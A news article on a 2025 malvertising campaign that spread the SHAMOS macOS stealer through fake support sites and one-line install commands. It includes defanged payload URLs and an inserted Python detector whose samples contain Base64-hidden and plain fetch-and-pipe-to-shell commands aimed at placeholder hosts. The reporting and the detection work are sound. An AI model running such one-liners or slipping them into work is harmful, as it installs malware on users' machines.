Malicious macOS support sites spread malware designed to steal sensitive information in a targeted series of attacks
In a recent blog post, cybersecurity firm CrowdStrike has revealed the discovery of a sophisticated malvertising campaign targeting hundreds of organisations between June and August 2025. This campaign, with roots traced back to a threat actor group linked to the Lazarus Group, aimed to infect victims with a variant of the Atomic macOS Stealer (AMOS), developed by malware-as-a-service group Cookie Spider.
The malware, known as SHAMOS, was distributed through malicious GitHub repositories and malicious macOS help websites. These websites provided false instructions to unsuspecting users, encouraging them to copy, paste, and execute a malicious one-line installation command. This technique allowed cybercriminals to bypass Gatekeeper security checks and install the SHAMOS Mach-O executable directly onto victim devices.
CrowdStrike stated that this campaign underscores the popularity of malicious one-line installation commands among eCrime actors. When executed, the command decodes a Base64-encoded string into a further command that downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh. This downloaded file is a Bash script that captures the user's password and downloads another SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update.
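The two one-liner shapes described above (a Base64 blob decoded and piped into a shell, and a fetch-and-pipe-to-shell installer) are easy to hunt for in process-execution or shell-history telemetry. The following is an added detection example, not code from CrowdStrike or from the article: it scans command lines for those shapes, decodes any long Base64 token so an analyst can see the hidden command and URL, and leaves benign uses of `base64 -d` and `curl` alone. The sample command lines and the `stealer.example.invalid` / `updates.example.invalid` domains are constructed placeholders, not the infrastructure named in the article.

```python
import base64
import re

# Shapes of the one-liners the article describes.
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:sh|bash|zsh)\b")
FETCH = re.compile(r"\b(?:curl|wget)\b")
SHELL_C_SUBST = re.compile(r"\b(?:sh|bash|zsh)\s+-c\s+.*\$\(")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s\"'|;&]+")

# Constructed samples: a placeholder URL hidden behind Base64, as a victim would paste it.
PAYLOAD_URL = "https://stealer.example.invalid/gm/install.sh"  # placeholder, not real
HIDDEN_CMD = f"curl -fsSL {PAYLOAD_URL} | bash"
ENCODED = base64.b64encode(HIDDEN_CMD.encode()).decode()

SAMPLE_COMMANDS = [
    f'echo "{ENCODED}" | base64 -d | sh',                 # decode, pipe to shell
    f'sh -c "$(echo {ENCODED} | base64 --decode)"',       # decode inside $( )
    "curl -fsSL https://updates.example.invalid/tool.sh | sh",  # fetch, pipe to shell
    "brew install wget",                                  # benign: mentions wget only
    "base64 -d image.b64 > image.png",                    # benign: decode to a file
]


def decode_base64_tokens(command: str) -> list[str]:
    """Return the printable ASCII decoding of every long Base64-looking token."""
    decoded = []
    for tok in B64_TOKEN.findall(command):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad chars or padding
            continue
        if not raw.isascii():
            continue
        text = raw.decode("ascii")
        if text.replace("\n", " ").replace("\t", " ").isprintable():
            decoded.append(text)
    return decoded


def analyze_command(command: str) -> dict:
    """Flag a command line and surface any URL it fetches, including hidden ones."""
    rules = []
    if B64_DECODE.search(command) and (
        PIPE_TO_SHELL.search(command) or SHELL_C_SUBST.search(command)
    ):
        rules.append("base64_decode_to_shell")
    if FETCH.search(command) and PIPE_TO_SHELL.search(command):
        rules.append("fetch_pipe_to_shell")
    decoded = decode_base64_tokens(command)
    urls = URL.findall(command)
    for text in decoded:
        urls.extend(URL.findall(text))
        if FETCH.search(text) and PIPE_TO_SHELL.search(text):
            rules.append("hidden_fetch_pipe_to_shell")
    return {"command": command, "rules": rules, "decoded": decoded, "urls": urls}


def flag_suspicious(commands: list[str]) -> list[dict]:
    """Return only the findings that matched at least one rule."""
    return [f for f in (analyze_command(c) for c in commands) if f["rules"]]


if __name__ == "__main__":
    for finding in flag_suspicious(SAMPLE_COMMANDS):
        print(finding["rules"], finding["urls"])
        for text in finding["decoded"]:
            print("  decoded:", text)
```

In practice the command lines would come from an EDR process-creation feed or from `~/.zsh_history` on the affected Mac; the decoded URL is the artefact to pivot on when triaging which hosts ran the installer.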
This isn't the first time eCrime actors have used this method: Cuckoo Stealer and SHAMOS operators previously leveraged the same approach in Homebrew malvertising campaigns between May 2024 and January 2025.
CrowdStrike blocked the malvertising campaign from attempting to compromise over 300 of its customer environments during this period. The malvertising site appeared in Google search results in locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy, and others.
CrowdStrike assesses with high confidence that eCrime actors are likely to continue leveraging both malvertising and one-line installation commands to distribute macOS information stealers. Users are advised to exercise caution when clicking on links from unfamiliar sources and to regularly update their security software.